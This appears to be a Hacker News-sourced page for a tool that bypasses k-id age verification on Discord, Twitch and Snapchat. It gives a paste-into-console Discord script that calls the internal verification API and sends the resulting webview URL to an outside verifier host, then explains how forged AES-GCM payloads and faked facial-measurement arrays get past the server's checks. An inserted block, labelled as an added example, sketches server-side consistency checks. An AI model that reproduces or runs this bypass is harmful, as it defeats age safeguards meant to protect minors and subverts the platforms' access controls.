Discord/Twitch/Snapchat age verification bypass
Source: Hacker News
Automatically age‑verifies your account as an adult on any website using k‑id.
Made by xyzeva and Dziurwa; greetz to amplitudes for previous work.
How to verify on Discord
It works regardless of your region (e.g., the UK). The script will verify your account for the upcoming global rollout in March as well as the current verification.
- Open Discord in a browser: .
- Press F12, go to the Console tab.
- Paste the script below, press Enter, and solve the captcha that appears (type “allow pasting” first if necessary).
```js
// add a chunk to get all of the webpack chunks
_mods = webpackChunkdiscord_app.push([[Symbol()],{},r=>r.c]);
webpackChunkdiscord_app.pop(); // cleanup the chunk we added
// utility to find a webpack chunk by property
findByProps = (...props) => {
  for (let m of Object.values(_mods)) {
    try {
      if (!m.exports || m.exports === window) continue;
      if (props.every(x => m.exports?.[x])) return m.exports;
      for (let ex in m.exports) {
        if (props.every(x => m.exports?.[ex]?.[x]) &&
            m.exports[ex][Symbol.toStringTag] !== 'IntlMessagesProxy')
          return m.exports[ex];
      }
    } catch {}
  }
}
// find the discord api client
api = findByProps('Bo','oh').Bo
// send an API request to Discord /age-verification/verify and then redirect the page to our website
window.location.href = `https://age-verifier.kibty.town/webview?url=${encodeURIComponent(
  (await api.post({ url: '/age-verification/verify', body: { method: 3 } })).body.verification_webview_url
)}`;
```
The script will redirect you to a verification page. Wait until it reports success – your Discord account is now age‑verified.
How to verify on other platforms (Twitch, Kick, Snapchat, …)
- Navigate to the platform’s age‑verification page and choose the selfie option.
- Capture the QR‑code URL that appears.
- Paste that URL into the provided input box on the verifier site and press Verify.
How does this work
k‑id, the provider Discord uses, does not store or transmit your actual face. Instead, it sends metadata about the facial scan and the verification process. This protects privacy compared to providers that upload raw video footage, but it also means that forged metadata can be accepted if it looks legitimate.
After the release of amplitudes’ k‑id verifier, the partner for face verification (FaceAssure) hardened the system, rendering the original bypass ineffective. With Discord’s decision to make age verification global, a new approach was needed.
Step 1: encrypted_payload and auth_tag
The old implementation omitted encrypted_payload, auth_tag, timestamp, and iv from the request body. The payload is encrypted with AES‑GCM, using a key derived from nonce + timestamp + transaction_id via HKDF‑SHA256. Replicating this process allows us to generate the missing parameters.
Step 2: Prediction data
Even with correct encryption, verification still fails because the server validates the prediction arrays: outputs, primaryOutputs, and raws.
- raws contain the raw facial measurements.
- primaryOutputs are derived from raws after a single z‑score outlier removal.
- outputs undergo a second outlier removal.
Additional checks include:
- xScaledShiftAmt and yScaledShiftAmt are limited to two possible values.
- The media name (camera) must match one of the devices listed in the client’s device array.
- State completion times must align with the expected timeline.
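A server-side sketch of the Step 2 consistency checks, added here as an illustration and not taken from k‑id, FaceAssure or the code this page describes. The z‑score threshold, every field name other than raws, primaryOutputs and outputs, and the strictly increasing timeline rule are assumptions; since every input is client-supplied, passing these checks shows only that a submission is internally consistent, not that it came from a real scan.

```javascript
// Added example, not k-id's or Discord's code. Z_LIMIT, the field names beyond
// raws/primaryOutputs/outputs, and the strictly-increasing timeline rule are assumptions.
const Z_LIMIT = 2.0;

// One pass of z-score outlier removal: keep values within zLimit std devs of the mean.
function removeOutliers(values, zLimit = Z_LIMIT) {
  const mean = values.reduce((a, b) => a + b, 0) / values.length;
  const sd = Math.sqrt(values.reduce((a, b) => a + (b - mean) ** 2, 0) / values.length);
  return sd === 0 ? values.slice() : values.filter(v => Math.abs(v - mean) / sd <= zLimit);
}

const sameArray = (a, b) =>
  Array.isArray(b) && a.length === b.length && a.every((v, i) => v === b[i]);

// Returns the names of failed checks; an empty list means internally consistent.
function validateSubmission(s) {
  if (!Array.isArray(s.raws) || s.raws.length === 0 || !s.raws.every(Number.isFinite)) {
    return ['raws-malformed'];
  }
  const failures = [];
  const primary = removeOutliers(s.raws);   // first pass over raws
  const outputs = removeOutliers(primary);  // second pass over the first result
  if (!sameArray(primary, s.primaryOutputs)) failures.push('primaryOutputs-mismatch');
  if (!sameArray(outputs, s.outputs)) failures.push('outputs-mismatch');
  if (!Array.isArray(s.devices) || !s.devices.includes(s.mediaName)) {
    failures.push('camera-not-in-device-list');
  }
  const t = Array.isArray(s.stateCompletionTimes) ? s.stateCompletionTimes : [];
  if (t.length === 0 || t.some((x, i) => i > 0 && x <= t[i - 1])) {
    failures.push('timeline-invalid');
  }
  return failures;
}

// Constructed sample: 80 falls out in the first pass, 36 in the second.
const RAWS = [30, 31, 29, 30, 31, 30, 29, 31, 30, 31, 36, 80];
const SAMPLE = {
  raws: RAWS,
  primaryOutputs: RAWS.slice(0, 11),
  outputs: RAWS.slice(0, 10),
  mediaName: 'Integrated Camera',
  devices: ['Integrated Camera', 'USB Webcam'],
  stateCompletionTimes: [120, 950, 2400, 4100],
};
console.log(validateSubmission(SAMPLE));
console.log(validateSubmission({ ...SAMPLE, outputs: SAMPLE.primaryOutputs }));
```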
All the code used for this bypass is open‑source and available on GitHub: .